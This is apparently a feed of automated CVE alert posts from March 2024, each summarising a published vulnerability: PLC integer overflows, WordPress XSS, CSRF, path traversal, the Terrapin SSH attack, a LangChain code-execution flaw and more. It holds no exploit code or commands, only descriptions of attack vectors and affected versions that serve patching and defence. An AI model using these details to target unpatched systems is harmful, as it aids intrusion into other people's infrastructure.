🚨 CVE-2024-1622Due to a mistake in error checking, Routinator will terminate when an incoming RTR connection is reset by the peer too quickly after opening.🎖@cveNotify |
|
| 2024-03-15 01:37:32 |
🚨 CVE-2024-1917Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-03-15 01:37:25 |
🚨 CVE-2024-0803Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet.🎖@cveNotify |
|
| 2024-03-15 01:37:24 |
🚨 CVE-2019-25210An issue was discovered in Cloud Native Computing Foundation (CNCF) Helm through 3.13.3. It displays values of secrets when the --dry-run flag is used. This is a security concern in some use cases, such as a --dry-run call by a CI/CD tool. NOTE: the vendor's position is that this behavior was introduced intentionally, and cannot be removed without breaking backwards compatibility (some users may be relying on these values). Also, it is not the Helm Project's responsibility if a user decides to use --dry-run within a CI/CD environment whose output is visible to unauthorized persons.🎖@cveNotify |
|
| 2024-03-14 23:37:25 |
🚨 CVE-2024-26246Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-03-14 23:37:24 |
🚨 CVE-2024-1853Zemana AntiLogger v2.74.204.664 is vulnerable to an Arbitrary Process Termination vulnerability by triggering the 0x80002048 IOCTL code of the zam64.sys and zamguard64.sys drivers.🎖@cveNotify |
|
| 2024-03-14 22:37:26 |
🚨 CVE-2024-2249The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the LinkWrapper attribute found in several widgets in all versions up to, and including, 1.3.7.4 due to insufficient input sanitization and output escaping the user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-14 22:37:25 |
🚨 CVE-2023-50677An issue in NETGEAR-DGND4000 v.1.1.00.15_1.00.15 allows a remote attacker to escalate privileges via the next_file parameter to the /setup.cgi component.🎖@cveNotify |
|
| 2024-03-14 22:37:24 |
🚨 CVE-2023-42286There is a PHP file inclusion vulnerability in the template configuration of eyoucms v1.6.4, allowing attackers to execute code or system commands through a carefully crafted malicious payload.🎖@cveNotify |
|
| 2024-03-14 21:37:25 |
🚨 CVE-2024-1713A user who can create objects in a database with plv8 3.2.1 installed is able to cause deferred triggers to execute as the Superuser during autovacuum.🎖@cveNotify |
|
| 2024-03-14 21:37:24 |
🚨 CVE-2023-0842xml2js version 0.4.23 allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.🎖@cveNotify |
|
| 2024-03-14 20:37:24 |
🚨 CVE-2024-26585In the Linux kernel, the following vulnerability has been resolved:tls: fix race between tx work scheduling and socket closeSimilarly to previous commit, the submitting thread (recvmsg/sendmsg)may exit as soon as the async crypto handler calls complete().Reorder scheduling the work before calling complete().This seems more logical in the first place, as it'sthe inverse order of what the submitting thread will do.🎖@cveNotify |
|
| 2024-03-14 20:07:38 |
🚨 CVE-2022-1386The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.🎖@cveNotify |
|
| 2024-03-14 20:07:37 |
🚨 CVE-2017-16530The uas driver in the Linux kernel before 4.13.6 allows local users to cause a denial of service (out-of-bounds read and system crash) or possibly have unspecified other impact via a crafted USB device, related to drivers/usb/storage/uas-detect.h and drivers/usb/storage/uas.c.🎖@cveNotify |
|
| 2024-03-14 20:07:32 |
🚨 CVE-2017-16528sound/core/seq_device.c in the Linux kernel before 4.13.4 allows local users to cause a denial of service (snd_rawmidi_dev_seq_free use-after-free and system crash) or possibly have unspecified other impact via a crafted USB device.🎖@cveNotify |
|
| 2024-03-14 20:07:31 |
🚨 CVE-2016-2143The fork implementation in the Linux kernel before 4.5 on s390 platforms mishandles the case of four page-table levels, which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted application, related to arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h.🎖@cveNotify |
|
| 2024-03-14 20:07:26 |
🚨 CVE-2015-2666Stack-based buffer overflow in the get_matching_model_microcode function in arch/x86/kernel/cpu/microcode/intel_early.c in the Linux kernel before 4.0 allows context-dependent attackers to gain privileges by constructing a crafted microcode header and leveraging root privileges for write access to the initrd.🎖@cveNotify |
|
| 2024-03-14 20:07:25 |
🚨 CVE-2012-2143The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.🎖@cveNotify |
|
| 2024-03-14 19:37:36 |
🚨 CVE-2024-28424zenml v0.55.4 was discovered to contain an arbitrary file upload vulnerability in the load function at /materializers/cloudpickle_materializer.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted file.🎖@cveNotify |
|
| 2024-03-14 19:37:32 |
🚨 CVE-2024-28423Airflow-Diagrams v2.1.0 was discovered to contain an arbitrary file upload vulnerability in the unsafe_load function at cli.py. This vulnerability allows attackers to execute arbitrary code via uploading a crafted YML file.🎖@cveNotify |
|
| 2024-03-14 19:37:31 |
🚨 CVE-2024-27266IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566.🎖@cveNotify |
|
| 2024-03-14 19:37:30 |
🚨 CVE-2024-24770vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation. Much like GHSA-45gq-q4xh-cp53, it is possible to find which usernames exist in vantage6 by calling the API routes `/recover/lost` and `/2fa/lost`. These routes send emails to users if they have lost their password or MFA token. This issue has been addressed in commit `aecfd6d0e` and is expected to ship in subsequent releases. Users are advised to upgrade as soon as a new release is available. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-03-14 19:37:26 |
🚨 CVE-2024-24562vantage6-UI is the official user interface for the vantage6 server. In affected versions a number of security headers are not set. This issue has been addressed in commit `68dfa6614` which is expected to be included in future releases. Users are advised to upgrade when a new release is made. While an upgrade path is not available users may modify the docker image build to insert the headers into nginx.🎖@cveNotify |
|
| 2024-03-14 19:37:25 |
🚨 CVE-2023-42938A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.13.1 for Windows. A local attacker may be able to elevate their privileges.🎖@cveNotify |
|
| 2024-03-14 19:37:24 |
🚨 CVE-2022-44117Boa 0.94.14rc21 is vulnerable to SQL Injection via username. NOTE: the is disputed by multiple third parties because Boa does not ship with any support for SQL.🎖@cveNotify |
|
| 2024-03-14 19:07:32 |
🚨 CVE-2024-23270The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, tvOS 17.4. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-03-14 19:07:26 |
🚨 CVE-2024-23268An injection issue was addressed with improved input validation. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to elevate privileges.🎖@cveNotify |
|
| 2024-03-14 19:07:25 |
🚨 CVE-2023-48986Cross Site Scripting (XSS) vulnerability in CU Solutions Group (CUSG) Content Management System (CMS) before v.7.75 allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted script to the users.php component.🎖@cveNotify |
|
| 2024-03-14 19:07:24 |
🚨 CVE-2023-48985Cross Site Scripting (XSS) vulnerability in CU Solutions Group (CUSG) Content Management System (CMS) before v.7.75 allows a remote attacker to execute arbitrary code, escalate privileges, and obtain sensitive information via a crafted script to the login.php component.🎖@cveNotify |
|
| 2024-03-14 17:37:32 |
🚨 CVE-2023-32633Improper input validation in the Intel(R) CSME installer software before version 2328.5.5.0 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-03-14 17:37:26 |
🚨 CVE-2023-32282Race condition in BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-03-14 17:37:25 |
🚨 CVE-2023-27502Insertion of sensitive information into log file for some Intel(R) Local Manageability Service software before version 2316.5.1.2 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2024-03-14 17:37:24 |
🚨 CVE-2023-22655Protection mechanism failure in some 3rd and 4th Generation Intel(R) Xeon(R) Processors when using Intel(R) SGX or Intel(R) TDX may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-03-14 16:37:25 |
🚨 CVE-2023-50168Pega Platform from 6.x to 8.8.4 is affected by an XXE issue with PDF Generation.🎖@cveNotify |
|
| 2024-03-14 16:37:24 |
🚨 CVE-2023-32783The event analysis component in Zoho ManageEngine ADAudit Plus 7.1.1 allows an attacker to bypass audit detection by creating or renaming user accounts with a "$" symbol suffix. NOTE: the vendor states "We do not consider this as a security bug and it's an expected behaviour."🎖@cveNotify |
|
| 2024-03-14 14:37:36 |
🚨 CVE-2024-25156A path traversal vulnerability exists in GoAnywhere MFT prior to 7.4.2 which allows attackers to circumvent endpoint-specific permission checks in the GoAnywhere Admin and Web Clients.🎖@cveNotify |
|
| 2024-03-14 14:37:29 |
🚨 CVE-2024-28383Tenda AX12 v1.0 v22.03.01.16 was discovered to contain a stack overflow via the ssid parameter in the sub_431CF0 function.🎖@cveNotify |
|
| 2024-03-14 14:37:28 |
🚨 CVE-2022-36781ConnectWise ScreenConnect versions 22.6 and below contained a flaw allowing potential brute force attacks on custom access tokens due to inadequate rate-limiting controls in the default configuration. Attackers could exploit this vulnerability to gain unauthorized access by repeatedly attempting access code combinations. ConnectWise has addressed this issue in later versions by implementing rate-limiting controls as a preventive measure against brute force attacks.🎖@cveNotify |
|
| 2024-03-14 13:37:30 |
🚨 CVE-2024-28417Webedition CMS 9.2.2.0 has a Stored XSS vulnerability via /webEdition/we_cmd.php.🎖@cveNotify |
|
| 2024-03-14 13:37:29 |
🚨 CVE-2024-1623Insufficient session timeout vulnerability in the FAST3686 V2 Vodafone router from Sagemcom. This vulnerability could allow a local attacker to access the administration panel without requiring login credentials. This vulnerability is possible because the 'Login.asp and logout.asp' files do not handle session details correctly.🎖@cveNotify |
|
| 2024-03-14 13:07:36 |
🚨 CVE-2024-0801A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll.🎖@cveNotify |
|
| 2024-03-14 13:07:35 |
🚨 CVE-2024-0799An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.🎖@cveNotify |
|
| 2024-03-14 10:37:24 |
🚨 CVE-2024-2247JFrog Artifactory versions below 7.77.7, 7.82.1, are vulnerable to DOM-based cross-site scripting due to improper handling of the import override mechanism.🎖@cveNotify |
|
| 2024-03-14 04:37:51 |
🚨 CVE-2024-22398An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and delete arbitrary files from the appliance file system.🎖@cveNotify |
|
| 2024-03-14 04:37:44 |
🚨 CVE-2024-1883This is a reflected cross site scripting vulnerability in the PaperCut NG/MF application server. An attacker can exploit this weakness by crafting a malicious URL that contains a script. When an unsuspecting user clicks on this malicious link, it could potentially lead to limited loss of confidentiality, integrity or availability.🎖@cveNotify |
|
| 2024-03-14 04:37:43 |
🚨 CVE-2024-1882This vulnerability allows an already authenticated admin user to create a malicious payload that could be leveraged for remote code execution on the server hosting the PaperCut NG/MF application server.🎖@cveNotify |
|
| 2024-03-14 03:37:37 |
🚨 CVE-2024-25652In Delinea PAM Secret Server 11.4, it is possible for a user (with access to the Report functionality) to gain unauthorized access to remote sessions created by legitimate users.🎖@cveNotify |
|
| 2024-03-14 03:37:36 |
🚨 CVE-2024-25649In Delinea PAM Secret Server 11.4, it is possible for an attacker (with Administrator access to the Secret Server machine) to read the following data from a memory dump: the decrypted master key, database credentials (when SQL Server Authentication is enabled), the encryption key of RabbitMQ queue messages, and session cookies.🎖@cveNotify |
|
| 2024-03-14 03:37:33 |
🚨 CVE-2024-1654This vulnerability potentially allows unauthorized write operations which may lead to remote code execution. An attacker must already have authenticated admin access and knowledge of both an internal system identifier and details of another valid user to exploit this.🎖@cveNotify |
|
| 2024-03-14 03:37:32 |
🚨 CVE-2024-1221This vulnerability potentially allows files on a PaperCut NG/MF server to be exposed using a specifically formed payload against the impacted API endpoint. The attacker must carry out some reconnaissance to gain knowledge of a system token. This CVE only affects Linux and macOS PaperCut NG/MF servers.🎖@cveNotify |
|
| 2024-03-14 03:37:31 |
🚨 CVE-2024-2400Use after free in Performance Manager in Google Chrome prior to 122.0.6261.128 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-14 02:37:41 |
🚨 CVE-2024-25650Insecure key exchange between Delinea PAM Secret Server 11.4 and the Distributed Engine 8.4.3 allows a PAM administrator to obtain the Symmetric Key (used to encrypt RabbitMQ messages) via crafted payloads to the /pre-authenticate, /authenticate, and /execute-and-respond REST API endpoints. This makes it possible for a PAM administrator to impersonate the Engine and exfiltrate sensitive information from the messages published in the RabbitMQ exchanges, without being audited in the application.🎖@cveNotify |
|
| 2024-03-14 02:37:40 |
🚨 CVE-2024-25228Vinchin Backup and Recovery 7.2 and Earlier is vulnerable to Authenticated Remote Code Execution (RCE) via the getVerifydiyResult function in ManoeuvreHandler.class.php.🎖@cveNotify |
|
| 2024-03-14 00:37:51 |
🚨 CVE-2024-28251Querybook is a Big Data Querying UI, combining collocated table metadata and a simple notebook interface. Querybook's datadocs functionality works by using a Websocket Server. The client talks to this WSS whenever updating/deleting/reading any cells as well as for watching the live status of query executions. Currently the CORS setting allows all origins, which could result in cross-site websocket hijacking and allow attackers to read/edit/remove datadocs of the user. This issue has been addressed in version 3.32.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-03-13 23:37:32 |
🚨 CVE-2024-23201A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.7.4, watchOS 10.3, tvOS 17.3, macOS Ventura 13.6.5, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2024-03-13 23:37:25 |
🚨 CVE-2024-23218A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key.🎖@cveNotify |
|
| 2024-03-13 23:37:24 |
🚨 CVE-2024-23204The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user.🎖@cveNotify |
|
| 2024-03-13 22:37:38 |
🚨 CVE-2024-23201A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.7.4, watchOS 10.3, tvOS 17.3, macOS Ventura 13.6.5, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2024-03-13 22:37:32 |
🚨 CVE-2024-0258The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.🎖@cveNotify |
|
| 2024-03-13 22:37:31 |
🚨 CVE-2024-23225A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-13 22:37:30 |
🚨 CVE-2024-23745In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack. NIB files can be manipulated to execute arbitrary commands. Additionally, even if a NIB file is modified within an application, Gatekeeper may still permit the execution of the application, enabling the execution of arbitrary commands within the application's context. NOTE: the vendor's perspective is that this is simply an instance of CVE-2022-48505, cannot properly be categorized as a product-level vulnerability, and cannot have a product-level fix because it is about incorrect caching of file signatures on macOS.🎖@cveNotify |
|
| 2024-03-13 22:37:26 |
🚨 CVE-2024-23218A timing side-channel issue was addressed with improvements to constant-time computation in cryptographic functions. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An attacker may be able to decrypt legacy RSA PKCS#1 v1.5 ciphertexts without having the private key.🎖@cveNotify |
|
| 2024-03-13 22:37:25 |
🚨 CVE-2023-34540Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the component JiraAPIWrapper (aka the JIRA API wrapper). This vulnerability allows attackers to execute arbitrary code via crafted input. As noted in the "releases/tag" reference, a fix is available.🎖@cveNotify |
|
| 2024-03-13 21:37:32 |
🚨 CVE-2023-42853A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-03-13 21:37:26 |
🚨 CVE-2022-42816A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-03-13 21:37:25 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-03-13 21:37:24 |
🚨 CVE-2022-48554File before 5.43 has an stack-based buffer over-read in file_copystr in funcs.c. NOTE: "File" is the name of an Open Source project.🎖@cveNotify |
|
| 2024-03-13 20:37:24 |
🚨 CVE-2024-24692Race condition in the installer for Zoom Rooms Client for Windows before version 5.17.5 may allow an authenticated user to conduct a denial of service via local access.🎖@cveNotify |
|
| 2024-03-13 19:37:27 |
🚨 CVE-2024-0800A path traversal vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.servlet.ImportNodeServlet.🎖@cveNotify |
|
| 2024-03-13 19:37:26 |
🚨 CVE-2024-0799An authentication bypass vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in the edge-app-base-webui.jar!com.ca.arcserve.edge.app.base.ui.server.EdgeLoginServiceImpl.doLogin() function within wizardLogin.🎖@cveNotify |
|
| 2024-03-13 18:37:38 |
🚨 CVE-2023-6969The User Shortcodes Plus plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.2 via the user_meta shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive user meta.🎖@cveNotify |
|
| 2024-03-13 18:37:32 |
🚨 CVE-2023-6957The Fluent Forms plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 5.1.9 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.🎖@cveNotify |
|
| 2024-03-13 18:37:31 |
🚨 CVE-2023-6825The File Manager and File Manager Pro plugins for WordPress are vulnerable to Directory Traversal in versions up to, and including version 7.2.1 (free version) and 8.3.4 (Pro version) via the target parameter in the mk_file_folder_manager_action_callback_shortcode function. This makes it possible for attackers to read the contents of arbitrary files on the server, which can contain sensitive information and to upload files into directories other than the intended directory for file uploads. The free version requires Administrator access for this vulnerability to be exploitable. The Pro version allows a file manager to be embedded via a shortcode and also allows admins to grant file handling privileges to other user levels, which could lead to this vulnerability being exploited by lower-level users.🎖@cveNotify |
|
| 2024-03-13 18:37:30 |
🚨 CVE-2023-6809The Custom fields shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cf shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied custom post meta values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-13 18:37:27 |
🚨 CVE-2023-6785The Download Manager plugin for WordPress is vulnerable to unauthorized file download of files added via the plugin in all versions up to, and including, 3.2.84. This makes it possible for unauthenticated attackers to download files added with the plugin (even when privately published).🎖@cveNotify |
|
| 2024-03-13 18:37:26 |
🚨 CVE-2024-25155In FileCatalyst Direct 3.8.8 and earlier through 3.8.6, the web server does not properly sanitize illegal characters in a URL which is then displayed on a subsequent error page. A malicious actor could craft a URL which would then execute arbitrary code within an HTML script tag.🎖@cveNotify |
|
| 2024-03-13 18:37:25 |
🚨 CVE-2024-25153A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.🎖@cveNotify |
|
| 2024-03-13 17:07:41 |
🚨 CVE-2018-17144Bitcoin Core 0.14.x before 0.14.3, 0.15.x before 0.15.2, and 0.16.x before 0.16.3 and Bitcoin Knots 0.14.x through 0.16.x before 0.16.3 allow a remote denial of service (application crash) exploitable by miners via duplicate input. An attacker can make bitcoind or Bitcoin-Qt crash.🎖@cveNotify |
|
| 2024-03-13 14:38:13 |
🚨 CVE-2024-28431DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/catalog_del.php.🎖@cveNotify |
|
| 2024-03-13 14:38:06 |
🚨 CVE-2024-21901A SQL injection vulnerability has been reported to affect myQNAPcloud. If exploited, the vulnerability could allow authenticated administrators to inject malicious code via a network.We have already fixed the vulnerability in the following versions:myQNAPcloud 1.0.52 ( 2023/11/24 ) and laterQTS 4.5.4.2627 build 20231225 and later🎖@cveNotify |
|
| 2024-03-13 14:38:05 |
🚨 CVE-2024-21899An improper authentication vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to compromise the security of the system via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.3.2578 build 20231110 and laterQTS 4.5.4.2627 build 20231225 and laterQuTS hero h5.1.3.2578 build 20231110 and laterQuTS hero h4.5.4.2626 build 20231225 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-03-13 13:37:40 |
🚨 CVE-2024-28666DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/media_add.php🎖@cveNotify |
|
| 2024-03-13 13:37:35 |
🚨 CVE-2024-28432DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/article_edit.php.🎖@cveNotify |
|
| 2024-03-13 13:37:34 |
🚨 CVE-2024-28429DedeCMS v5.7 was discovered to contain a Cross-Site Request Forgery (CSRF) vulnerability via the component /dede/archives_do.php🎖@cveNotify |
|
| 2024-03-13 12:38:22 |
🚨 CVE-2023-5410A potential security vulnerability has been reported in the system BIOS of certain HP PC products, which might allow memory tampering. HP is releasing mitigation for the potential vulnerability.🎖@cveNotify |
|
| 2024-03-13 12:38:17 |
🚨 CVE-2024-28098The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role.This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6.2.11 Apache Pulsar users should upgrade to at least 2.11.4.3.0 Apache Pulsar users should upgrade to at least 3.0.3.3.1 Apache Pulsar users should upgrade to at least 3.1.3.3.2 Apache Pulsar users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.🎖@cveNotify |
|
| 2024-03-13 12:38:16 |
🚨 CVE-2024-27135Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true".This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6.2.11 Pulsar Function Worker users should upgrade to at least 2.11.4.3.0 Pulsar Function Worker users should upgrade to at least 3.0.3.3.1 Pulsar Function Worker users should upgrade to at least 3.1.3.3.2 Pulsar Function Worker users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.🎖@cveNotify |
|
| 2024-03-13 12:38:11 |
🚨 CVE-2024-1765Cloudflare Quiche (through version 0.19.1/0.20.0) was affected by an unlimited resource allocation vulnerability causing rapid increase of memory usage of the system running quiche server or client.A remote attacker could take advantage of this vulnerability by repeatedly sending an unlimited number of 1-RTT CRYPTO frames after previously completing the QUIC handshake.Exploitation was possible for the duration of the connection which could be extended by the attacker. quiche 0.19.2 and 0.20.1 are the earliest versions containing the fix for this issue.🎖@cveNotify |
|
| 2024-03-13 12:38:10 |
🚨 CVE-2024-1137The Proxy and Client components of TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition contain a vulnerability that theoretically allows an Active Spaces client to passively observe data traffic to other clients. Affected releases are TIBCO Software Inc.'s TIBCO ActiveSpaces - Enterprise Edition: versions 4.4.0 through 4.9.0.🎖@cveNotify |
|
| 2024-03-13 10:38:39 |
🚨 CVE-2024-2123The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-13 10:38:35 |
🚨 CVE-2023-38723IBM Maximo Application Suite 7.6.1.3 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 262192.🎖@cveNotify |
|
| 2024-03-13 10:38:34 |
🚨 CVE-2023-28517IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 250421.🎖@cveNotify |
|
| 2024-03-13 09:38:04 |
🚨 CVE-2015-10123An unautheticated remote attacker could send specifically crafted packets to a affected device. If an authenticated user then views that data in a specific page of the web-based management a buffer overflow will be triggered to gain full access of the device.🎖@cveNotify |
|
| 2024-03-13 08:37:25 |
🚨 CVE-2024-28623RiteCMS v3.0.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component main_menu/edit_section.🎖@cveNotify |
|
| 2024-03-13 08:37:24 |
🚨 CVE-2024-26529An issue in mz-automation libiec61850 v.1.5.3 and before, allows a remote attacker to cause a denial of service (DoS) via the mmsServer_handleDeleteNamedVariableListRequest function of src/mms/iso_mms/server/mms_named_variable_list_service.c.🎖@cveNotify |
|
| 2024-03-13 07:37:39 |
